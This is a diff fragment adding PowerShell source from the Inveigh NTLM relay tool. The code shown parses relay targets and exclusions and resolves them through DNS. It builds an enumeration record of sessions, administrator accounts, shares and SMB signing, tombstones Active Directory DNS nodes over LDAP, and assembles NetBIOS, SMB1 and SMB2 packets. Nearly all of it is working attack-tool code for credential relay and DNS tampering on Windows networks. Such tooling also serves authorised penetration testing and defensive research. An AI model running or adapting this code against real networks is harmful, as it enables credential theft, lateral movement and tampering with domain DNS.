+ }
+ else
+ {
+ $target_list.Add($entry) > $null
+ }
+
+ }
+
+ return $target_list
+}
+
+if($Target)
+{
+
+ if($Target.Count -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Relay Target = " + ($Target -join ",")) > $null
+ }
+ elseif($Target.Count -gt 3)
+ {
+ $inveigh.output_queue.Add("[+] Relay Targets = " + ($Target[0..2] -join ",") + "...") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Relay Targets = " + ($Target -join ",")) > $null
+ }
+
+ $inveigh.output_queue.Add("[*] Parsing Relay Target List") > $null
+ [Array]$inveigh.target_list = Get-TargetList $Target
+}
+
+if($TargetExclude)
+{
+
+ if($TargetExclude.Count -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Relay Target Exclude = " + ($TargetExclude -join ",")) > $null
+ }
+ elseif($TargetExclude.Count -gt 3)
+ {
+ $inveigh.output_queue.Add("[+] Relay Targets Exclude = " + ($TargetExclude[0..2] -join ",") + "...") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Relay Targets Exclude = " + ($TargetExclude -join ",")) > $null
+ }
+
+ $inveigh.output_queue.Add("[*] Parsing Relay Target Exclude List") > $null
+ [Array]$inveigh.target_exclude_list = Get-TargetList $TargetExclude
+}
+
+if($Username)
+{
+
+ if($Username.Count -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Relay Username = " + ($Username -join ",")) > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Relay Usernames = " + ($Username -join ",")) > $null
+ }
+
+}
+
+if($RelayAutoDisable -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Disable = Enabled") > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Disable = Disabled") > $null
+}
+
+if($RelayAutoExit -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Exit = Enabled") > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Relay Auto Exit = Disabled") > $null
+}
+
+if($Service)
+{
+ $inveigh.output_queue.Add("[+] Relay Service = $Service") > $null
+}
+
+if($ConsoleOutput -ne 'N')
+{
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Enabled") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = $ConsoleOutput") > $null
+ }
+
+ $inveigh.console_output = $true
+
+ if($ConsoleStatus -eq 1)
+ {
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minute") > $null
+ }
+ elseif($ConsoleStatus -gt 1)
+ {
+ $inveigh.output_queue.Add("[+] Console Status = $ConsoleStatus Minutes") > $null
+ }
+
+}
+else
+{
+
+ if($inveigh.tool -eq 1)
+ {
+ $inveigh.output_queue.Add("[!] Real Time Console Output Disabled Due To External Tool Selection") > $null
+ }
+ else
+ {
+ $inveigh.output_queue.Add("[+] Real Time Console Output = Disabled") > $null
+ }
+
+}
+
+if($ConsoleUnique -eq 'Y')
+{
+ $inveigh.console_unique = $true
+}
+else
+{
+ $inveigh.console_unique = $false
+}
+
+if($FileOutput -eq 'Y')
+{
+ $inveigh.output_queue.Add("[+] Real Time File Output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Output Directory = $output_directory") > $null
+ $inveigh.file_output = $true
+}
+else
+{
+ $inveigh.output_queue.Add("[+] Real Time File Output = Disabled") > $null
+}
+
+if($FileUnique -eq 'Y')
+{
+ $inveigh.file_unique = $true
+}
+else
+{
+ $inveigh.file_unique = $false
+}
+
+if($LogOutput -eq 'Y')
+{
+ $inveigh.log_output = $true
+}
+else
+{
+ $inveigh.log_output = $false
+}
+
+if($RunTime -eq 1)
+{
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minute") > $null
+}
+elseif($RunTime -gt 1)
+{
+ $inveigh.output_queue.Add("[+] Run Time = $RunTime Minutes") > $null
+}
+
+if($ShowHelp -eq 'Y')
+{
+ $inveigh.output_queue.Add("[!] Run Stop-Inveigh to stop") > $null
+
+ if($inveigh.console_output)
+ {
+ $inveigh.output_queue.Add("[*] Press any key to stop console output") > $null
+ }
+
+}
+
+while($inveigh.output_queue.Count -gt 0)
+{
+
+ switch -Wildcard ($inveigh.output_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Warning($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ default
+ {
+
+ if($inveigh.status_output -and $inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.output_queue[0] + $inveigh.newline)
+ }
+ elseif($inveigh.status_output)
+ {
+ Write-Output($inveigh.output_queue[0])
+ }
+
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add($inveigh.output_queue[0]) > $null
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($inveigh.output_queue[0]) > $null
+ }
+
+ $inveigh.output_queue.RemoveAt(0)
+ }
+
+ }
+
+}
+
+$inveigh.status_output = $false
+$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value
+$inveigh.computer_name = (Get-ChildItem -path env:computername).Value
+
+try
+{
+ $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain -ErrorAction 'SilentlyContinue').Value).ToLower()
+ $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower()
+
+ if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain))
+ {
+ $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain)
+ }
+
+}
+catch
+{
+ $inveigh.DNS_domain = $inveigh.netBIOS_domain
+ $inveigh.DNS_computer_name = $inveigh.computer_name
+}
+
+if($inveigh.enumerate)
+{
+ $inveigh.output_queue.Add("[*] Performing DNS lookups for imported targets") > $null
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].Hostname -and !$inveigh.enumerate[$i].IP -and $inveigh.enumerate[$i]."DNS Record" -ne $false)
+ {
+
+ try
+ {
+ $IP_list = [System.Net.Dns]::GetHostEntry($inveigh.enumerate[$i].Hostname)
+
+ foreach($entry in $IP_list.AddressList)
+ {
+
+ if($entry.AddressFamily -eq 'InterNetwork')
+ {
+ $inveigh.enumerate[$i].IP = $entry.IPAddressToString
+ $inveigh.enumerate[$i]."DNS Record" = $true
+ $inveigh.enumerate[$i]."IPv6 Only" = $false
+ $target_enumerate_keep = $true
+ }
+
+ }
+
+ if(!$target_enumerate_keep)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] IPv6 target $($inveigh.enumerate[$i].Hostname) not supported") > $null
+ $inveigh.enumerate[$i]."IPv6 Only" = $true
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS lookup for $($inveigh.enumerate[$i].Hostname) failed") > $null
+ $inveigh.enumerate[$i]."DNS Record" = $false
+ }
+
+ $target_enumerate_keep = $false
+ $IP_list = $null
+ }
+
+ }
+
+}
+
+if($inveigh.target_list)
+{
+ $inveigh.output_queue.Add("[*] Performing DNS lookups on any hostname targets") > $null
+
+ for($i = 0;$i -lt $inveigh.target_list.Count;$i++)
+ {
+
+ if(!($inveigh.target_list[$i] -as [IPAddress] -as [Bool]))
+ {
+
+ try
+ {
+ $IP_list = [System.Net.Dns]::GetHostEntry($inveigh.target_list[$i])
+
+ foreach($entry in $IP_list.AddressList)
+ {
+
+ if($entry.AddressFamily -eq 'InterNetwork')
+ {
+ $inveigh.target_list[$i] = $entry.IPAddressToString
+ $target_keep = $true
+ }
+
+ if(!$target_keep)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] IPv6 target $($inveigh.target_list[$i]) not supported") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed $($inveigh.target_list[$i]) from target list") > $null
+ $inveigh.target_list[$i] = $null
+ }
+
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS lookup for $($inveigh.target_list[$i]) failed") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed $($inveigh.target_list[$i]) from target list") > $null
+ $inveigh.target_list[$i] = $null
+ }
+
+ $target_keep = $false
+ $IP_list = $null
+ }
+
+ }
+
+ if(!$inveigh.target_list -and !$inveigh.enumerated)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] No remaining targets") > $null
+ throw
+ }
+
+}
+
+if($inveigh.target_exclude_list)
+{
+ $inveigh.output_queue.Add("[*] Performing DNS lookups on excluded hostname targets") > $null
+
+ for($i = 0;$i -lt $inveigh.target_exclude_list.Count;$i++)
+ {
+
+ if(!($inveigh.target_exclude_list[$i] -as [IPAddress] -as [Bool]))
+ {
+
+ try
+ {
+ $IP_list = [System.Net.Dns]::GetHostEntry($inveigh.target_exclude_list[$i])
+
+ foreach($entry in $IP_list.AddressList)
+ {
+
+ if($entry.AddressFamily -eq 'InterNetwork')
+ {
+ $inveigh.target_exclude_list[$i] = $entry.IPAddressToString
+ $target_exclude_keep = $true
+ }
+
+ }
+
+ if(!$target_exclude_keep)
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] IPv6 target $($inveigh.target_list[$i]) not supported") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed $($inveigh.target_exclude_list[$i]) from exclusion list") > $null
+ $inveigh.target_exclude_list[$i] = $null
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS lookup for $($inveigh.target_exclude_list[$i]) failed") > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] Removed $($inveigh.target_exclude_list[$i]) from exclusion list") > $null
+ $inveigh.target_exclude_list[$i] = $null
+ }
+
+ $target_exclude_keep = $false
+ $IP_list = $null
+ }
+
+ }
+
+}
+
+if($inveigh.target_list -and $inveigh.target_exclude_list)
+{
+ $inveigh.target_list = Compare-Object -ReferenceObject $inveigh.target_exclude_list -DifferenceObject $inveigh.target_list -PassThru
+}
+
+#endregion
+#region begin script blocks
+
+# Shared Basic Functions ScriptBlock
+$shared_basic_functions_scriptblock =
+{
+
+ function Get-UInt16DataLength
+ {
+ param ([Int]$Start,[Byte[]]$Data)
+
+ $data_length = [System.BitConverter]::ToUInt16($Data[$Start..($Start + 1)],0)
+
+ return $data_length
+ }
+
+ function Get-UInt32DataLength
+ {
+ param ([Int]$Start,[Byte[]]$Data)
+
+ $data_length = [System.BitConverter]::ToUInt32($Data[$Start..($Start + 3)],0)
+
+ return $data_length
+ }
+
+ function Convert-DataToString
+ {
+ param ([Int]$Start,[Int]$Length,[Byte[]]$Data)
+
+ $string_data = [System.BitConverter]::ToString($Data[$Start..($Start + $Length - 1)])
+ $string_data = $string_data -replace "-00",""
+ $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+
+ return $string_extract
+ }
+
+ function New-RelayEnumObject
+ {
+ param ($IP,$Hostname,$DNSDomain,$netBIOSDomain,$Sessions,$AdministratorUsers,$AdministratorGroups,
+ $Privileged,$Shares,$NetSessions,$NetSessionsMapped,$LocalUsers,$SMB2,$Signing,$SMBServer,$DNSRecord,
+ $IPv6Only,$Targeted,$Enumerate,$Execute)
+
+ if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)}
+ if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)}
+ if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)}
+ if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)}
+ if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)}
+ if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)}
+ if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)}
+ if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)}
+
+ $relay_object = New-Object PSObject
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumerate.Count
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "DNS Domain" $DNSDomain
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "netBIOS Domain" $netBIOSDomain
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "DNS Record" $DNSRecord
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IPv6 Only" $IPv6Only
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumerate
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execute
+
+ return $relay_object
+ }
+
+ function Invoke-SessionUpdate
+ {
+ param ([String]$domain,[String]$username,[String]$hostname,[String]$IP)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+ $session = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $hostname_full = ($hostname + "." + $inveigh.domain_mapping_table.$domain).ToUpper()
+ }
+ else
+ {
+ $session = $domain + "\" + $username
+ }
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].Hostname -eq $hostname_full -or $inveigh.enumerate[$i].IP -eq $IP)
+ {
+
+ if(!$inveigh.enumerate[$i].Hostname)
+ {
+ $inveigh.enumerate[$target_index].Hostname = $hostname_full
+ }
+
+ [Array]$session_list = $inveigh.enumerate[$i].Sessions
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+
+ for($j = 0;$j -lt $session_list.Count;$j++)
+ {
+
+ if($session_list[$j] -like "$domain\*")
+ {
+ $session_username = ($session_list[$j].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$domain
+ $session_list[$j] += $session_update
+ $inveigh.enumerate[$i].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumerate[$i].Sessions = $session_list
+ }
+
+ $target_updated = $true
+ break
+ }
+
+ }
+
+ if(!$target_updated)
+ {
+ $inveigh.enumerate.Add((New-RelayEnumObject -IP $IP -Hostname $hostname_full -Sessions $session)) > $null
+ }
+
+ }
+
+}
+
+# ADIDNS Functions ScriptBlock
+$ADIDNS_functions_scriptblock =
+{
+
+ function Disable-ADIDNSNode
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ foreach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ $timestamp = [Int64](([datetime]::UtcNow.Ticks)-(Get-Date "1/1/1601").Ticks)
+ $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp))
+ $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)}
+
+ [Byte[]]$DNS_record = 0x08,0x00,0x00,0x00,0x05,0x00,0x00,0x00 +
+ $SOASerialNumberArray[0..3] +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $timestamp
+
+ try
+ {
+ $directory_entry.InvokeSet('dnsRecord',$DNS_record)
+ $directory_entry.InvokeSet('dnsTombstoned',$true)
+ $directory_entry.SetInfo()
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS node $Node tombstoned in $Zone") > $null
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim())") > $null
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ }
+
+ function New-SOASerialNumberArray
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][String]$Zone
+ )
+
+ $Zone = $Zone.ToLower()
+
+ function Convert-DataToUInt16($Field)
+ {
+ [Array]::Reverse($Field)
+ return [System.BitConverter]::ToUInt16($Field,0)
+ }
+
+ function ConvertFrom-PacketOrderedDictionary($OrderedDictionary)
+ {
+
+ foreach($field in $OrderedDictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ function New-RandomByteArray
+ {
+ param([Int]$Length,[Int]$Minimum=1,[Int]$Maximum=255)
+
+ [String]$random = [String](1..$Length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $Minimum -Maximum $Maximum)})
+ [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $random
+ }
+
+ function New-DNSNameArray
+ {
+ param([String]$Name)
+
+ $character_array = $Name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
+ $name_start = 0
+
+ foreach($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($Name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $Name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ function New-PacketDNSSOAQuery
+ {
+ param([String]$Name)
+
+ [Byte[]]$type = 0x00,0x06
+ [Byte[]]$name = (New-DNSNameArray $Name) + 0x00
+ [Byte[]]$length = [System.BitConverter]::GetBytes($Name.Count + 16)[1,0]
+ [Byte[]]$transaction_ID = New-RandomByteArray 2
+ $DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
+ $DNSQuery.Add("Length",$length)
+ $DNSQuery.Add("TransactionID",$transaction_ID)
+ $DNSQuery.Add("Flags",[Byte[]](0x01,0x00))
+ $DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
+ $DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("Queries_Name",$name)
+ $DNSQuery.Add("Queries_Type",$type)
+ $DNSQuery.Add("Queries_Class",[Byte[]](0x00,0x01))
+
+ return $DNSQuery
+ }
+
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ $packet_DNSQuery = New-PacketDNSSOAQuery $Zone
+ [Byte[]]$DNS_client_send = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+
+ if($DNS_client_receive[9] -eq 0)
+ {
+ $inveigh.output_queue.Add("[-] $Zone SOA record not found") > $null
+ }
+ else
+ {
+ $DNS_reply_converted = [System.BitConverter]::ToString($DNS_client_receive)
+ $DNS_reply_converted = $DNS_reply_converted -replace "-",""
+ $SOA_answer_index = $DNS_reply_converted.IndexOf("C00C00060001")
+ $SOA_answer_index = $SOA_answer_index / 2
+ $SOA_length = $DNS_client_receive[($SOA_answer_index + 10)..($SOA_answer_index + 11)]
+ $SOA_length = Convert-DataToUInt16 $SOA_length
+ [Byte[]]$SOA_serial_current_array = $DNS_client_receive[($SOA_answer_index + $SOA_length - 8)..($SOA_answer_index + $SOA_length - 5)]
+ $SOA_serial_current = [System.BitConverter]::ToUInt32($SOA_serial_current_array[3..0],0) + 1
+ [Byte[]]$SOA_serial_number_array = [System.BitConverter]::GetBytes($SOA_serial_current)[0..3]
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] $DomainController did not respond on TCP port 53") > $null
+ }
+
+ return [Byte[]]$SOA_serial_number_array
+ }
+
+}
+
+# Packet Functions ScriptBlock
+$packet_functions_scriptblock =
+{
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($OrderedDictionary)
+
+ ForEach($field in $OrderedDictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ function Get-ProcessIDArray
+ {
+ $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+ $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+ [Byte[]]$process_ID = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $process_ID
+ }
+
+
+ #NetBIOS
+
+ function New-PacketNetBIOSSessionService
+ {
+ param([Int]$HeaderLength,[Int]$DataLength)
+
+ [Byte[]]$length = ([System.BitConverter]::GetBytes($HeaderLength + $DataLength))[2..0]
+
+ $NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $NetBIOSSessionService.Add("MessageType",[Byte[]](0x00))
+ $NetBIOSSessionService.Add("Length",$length)
+
+ return $NetBIOSSessionService
+ }
+
+ #SMB1
+
+ function New-PacketSMBHeader
+ {
+ param([Byte[]]$Command,[Byte[]]$Flags,[Byte[]]$Flags2,[Byte[]]$TreeID,[Byte[]]$ProcessID,[Byte[]]$UserID)
+
+ $ProcessID = $ProcessID[0,1]
+
+ $SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $SMBHeader.Add("Command",$Command)
+ $SMBHeader.Add("ErrorClass",[Byte[]](0x00))
+ $SMBHeader.Add("Reserved",[Byte[]](0x00))
+ $SMBHeader.Add("ErrorCode",[Byte[]](0x00,0x00))
+ $SMBHeader.Add("Flags",$Flags)
+ $SMBHeader.Add("Flags2",$Flags2)
+ $SMBHeader.Add("ProcessIDHigh",[Byte[]](0x00,0x00))
+ $SMBHeader.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMBHeader.Add("Reserved2",[Byte[]](0x00,0x00))
+ $SMBHeader.Add("TreeID",$TreeID)
+ $SMBHeader.Add("ProcessID",$ProcessID)
+ $SMBHeader.Add("UserID",$UserID)
+ $SMBHeader.Add("MultiplexID",[Byte[]](0x00,0x00))
+
+ return $SMBHeader
+ }
+ function New-PacketSMBNegotiateProtocolRequest
+ {
+ param([String]$Version)
+
+ if($Version -eq 'SMB1')
+ {
+ [Byte[]]$byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$byte_count = 0x22,0x00
+ }
+
+ $SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMBNegotiateProtocolRequest.Add("WordCount",[Byte[]](0x00))
+ $SMBNegotiateProtocolRequest.Add("ByteCount",$byte_count)
+ $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($version -ne 'SMB1')
+ {
+ $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $SMBNegotiateProtocolRequest.Add("RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $SMBNegotiateProtocolRequest
+ }
+
+ #SMB2
+
+ function New-PacketSMB2Header
+ {
+ param([Byte[]]$Command,[Byte[]]$CreditRequest,[Bool]$Signing,[Int]$MessageID,[Byte[]]$ProcessID,[Byte[]]$TreeID,[Byte[]]$SessionID)
+
+ if($Signing)
+ {
+ $flags = 0x08,0x00,0x00,0x00
+ }
+ else
+ {
+ $flags = 0x00,0x00,0x00,0x00
+ }
+
+ [Byte[]]$message_ID = [System.BitConverter]::GetBytes($MessageID)
+
+ if($message_ID.Length -eq 4)
+ {
+ $message_ID += 0x00,0x00,0x00,0x00
+ }
+
+ $SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2Header.Add("ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42))
+ $SMB2Header.Add("StructureSize",[Byte[]](0x40,0x00))
+ $SMB2Header.Add("CreditCharge",[Byte[]](0x01,0x00))
+ $SMB2Header.Add("ChannelSequence",[Byte[]](0x00,0x00))
+ $SMB2Header.Add("Reserved",[Byte[]](0x00,0x00))
+ $SMB2Header.Add("Command",$Command)
+ $SMB2Header.Add("CreditRequest",$CreditRequest)
+ $SMB2Header.Add("Flags",$flags)
+ $SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2Header.Add("MessageID",$message_ID)
+ $SMB2Header.Add("ProcessID",$ProcessID)
+ $SMB2Header.Add("TreeID",$TreeID)
+ $SMB2Header.Add("SessionID",$SessionID)
+ $SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+
+ return $SMB2Header
+ }
+
+ function New-PacketSMB2NegotiateProtocolRequest
+ {
+ $SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $SMB2NegotiateProtocolRequest.Add("StructureSize",[Byte[]](0x24,0x00))
+ $SMB2NegotiateProtocolRequest.Add("DialectCount",[Byte[]](0x02,0x00))
+ $SMB2NegotiateProtocolRequest.Add("SecurityMode",[Byte[]](0x01,0x00))
+ $SMB2NegotiateProtocolRequest.Add("Reserved",[Byte[]](0x00,0x00))
+ $SMB2NegotiateProtocolRequest.Add("Capabilities",[Byte[]](0x40,0x00,0x00,0x00))
+ $SMB2NegotiateProtocolRequest.Add("ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $SMB2NegotiateProtocolRequest.Add("NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00))
+ $SMB2NegotiateProtocolRequest.Add("NegotiateContextCount",[Byte[]](0x00,0x00))
+ $SMB2NegotiateProtocolRequest.Add("Reserved2",[Byte[]](0x00,0x00))
